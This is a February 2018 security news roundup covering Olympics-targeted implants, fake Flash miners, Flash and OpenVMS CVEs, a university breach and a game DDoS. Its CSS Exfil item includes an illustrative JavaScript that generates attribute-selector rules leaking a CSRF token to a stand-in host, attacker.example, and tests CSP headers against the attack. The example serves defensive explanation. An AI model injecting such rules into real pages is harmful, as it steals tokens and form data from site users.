Phishing campaigns targeting organizations involved in the 2018 Winter Olympics are delivering malicious implants. Named Gold Dragon, Brave Prince, Ghost419 and RunningRat, these implants appear once an initial PowerShell backdoor has been installed.
Gold Dragon, a data-gathering implant, generates a key to encrypt the data it harvests from the infected system and sends that data to a remote server.
Fake Flash update drops CPU miners
Software posing as a Flash update is installing CPU miners on victims' computers. The miners are spreading through fake Facebook video pages that ask users to install a Flash player to continue watching, which tricks them into downloading the miner instead.
Security patches have been released for Adobe Flash Player on Windows, Macintosh, Linux and Chrome OS to address two critical vulnerabilities, CVE-2018-4878 and CVE-2018-4877, both of which allow remote code execution. CVE-2018-4878 was already being exploited in the wild before the patch shipped, so the update is urgent. Users are advised to update to the patched release, Flash Player 28.0.0.161, to stay safe.
Exploitable bug affecting Alpha and Itanium systems
A privilege escalation flaw has been found in OpenVMS running on VAX and Alpha processors. Tracked as CVE-2017-17482, the bug could also affect Intel Itanium systems that are part of mixed-architecture clusters. The vulnerability stems from a flaw in the command-line processing code of DCL, the OpenVMS command interpreter.
CSS Exfil attack
CSS has long been a mainstay of web pages, and attackers have started abusing it in CSS Exfil attacks: stylesheet rules injected into a page (for example, attribute selectors that match the first characters of an input's value and load a background image from an attacker-controlled host) leak page content such as tokens and form values without running any script. Pages that let untrusted CSS into the document through poor input handling are exposed. Site owners are advised to deploy a Content Security Policy (CSP) as an added security layer, restricting where styles may load from and which hosts the page may fetch images and other resources from, so that injected rules cannot phone home.
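The following is an added example, not code from the Cyware briefing or from the CSS Exfil research it summarizes. It shows the mechanics of the attack described above (attribute-selector prefix matching that triggers a request per leaked character) and a check of whether a given CSP header would stop both the injected style and its callback. The collector URL `https://attacker.example/leak`, the `csrf` input and the hexadecimal charset are constructed for illustration; the "browser" here is a simulator that only evaluates `^=` prefix selectors, and a real attack leaks one character per stylesheet round, so the loop stands in for repeated injection or chained `@import` rounds.

```javascript
// Hypothetical attacker collector and the character set the attacker expects in the value.
const COLLECTOR = 'https://attacker.example/leak';
const CHARSET = 'abcdef0123456789';

// One exfil rule per candidate next character: the rule whose prefix matches the real
// attribute value makes the browser fetch a background image, leaking the guess.
function buildExfilRules(selectorBase, attr, knownPrefix, charset = CHARSET) {
  return [...charset].map((ch) => {
    const guess = knownPrefix + ch;
    const css = `${selectorBase}[${attr}^="${guess}"] ` +
      `{ background-image: url("${COLLECTOR}?v=${encodeURIComponent(guess)}"); }`;
    return { guess, css };
  });
}

// Simulated browser: for each round, the single rule whose prefix matches fires a request.
// Stops when the next real character is outside the attacker's charset.
function simulateLeak(selectorBase, attr, realValue, charset = CHARSET) {
  let known = '';
  const requests = [];
  while (known.length < realValue.length) {
    const hit = buildExfilRules(selectorBase, attr, known, charset)
      .find((r) => realValue.startsWith(r.guess));
    if (!hit) break;
    known = hit.guess;
    requests.push(`${COLLECTOR}?v=${encodeURIComponent(known)}`);
  }
  return { recovered: known, requests };
}

// Minimal CSP parser: "name value value; name value" -> { name: [values] }.
function parseCsp(header) {
  const directives = {};
  for (const part of header.split(';')) {
    const [name, ...values] = part.trim().split(/\s+/);
    if (name) directives[name] = values;
  }
  return directives;
}

function sourceAllows(sources, origin) {
  return sources.some((s) => s === '*' || s === 'https:' || s === origin);
}

// Does this CSP stop the attack? The callback is blocked when img-src (or default-src as
// fallback) does not allow the collector origin; the injected rule itself is blocked when
// style-src (or default-src) allows neither inline styles nor a stylesheet from that origin.
function cspBlocksExfil(header, collectorOrigin) {
  const d = parseCsp(header);
  const imgSources = d['img-src'] || d['default-src'];
  const styleSources = d['style-src'] || d['default-src'];
  const callbackAllowed = !imgSources || sourceAllows(imgSources, collectorOrigin);
  const injectedStyleAllowed = !styleSources ||
    styleSources.includes("'unsafe-inline'") || sourceAllows(styleSources, collectorOrigin);
  return { blocksCallback: !callbackAllowed, blocksInjectedStyle: !injectedStyleAllowed };
}

// Usage: leak a constructed CSRF token, then compare a weak and a hardened policy.
const leak = simulateLeak('input[name="csrf"]', 'value', 'a1b2');
const weak = cspBlocksExfil("default-src *; style-src 'unsafe-inline'", 'https://attacker.example');
const hardened = cspBlocksExfil("default-src 'self'; style-src 'self'; img-src 'self'", 'https://attacker.example');
console.log(leak.recovered, leak.requests.length, weak, hardened);
```

The weak policy leaves both halves of the attack open; the hardened one blocks the injected rule (no `'unsafe-inline'`, no attacker host in `style-src`) and, independently, blocks the callback (`img-src 'self'`). Both directives matter: a page that only locks down `style-src` can still be hit if CSS reaches the document through some other path, and a page that only locks down `img-src` still leaks through other `url()`-bearing properties unless `default-src` is restricted too.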
University of Northern Colorado (UNC) recently suffered a data breach that exposed the personal information of 12 employees. The attackers used the employees' stolen Social Security numbers to reset their passwords and access their accounts, and the victims' W-2 forms were also stolen.
DDoS attacks on Final Fantasy XIV network
The network hosting the Final Fantasy XIV game was disrupted by a distributed denial of service (DDoS) attack. As a result, players had difficulty logging in to Worlds in the JP data center and accessing, sending and receiving data from JP data centers.
Posted on: February 07, 2018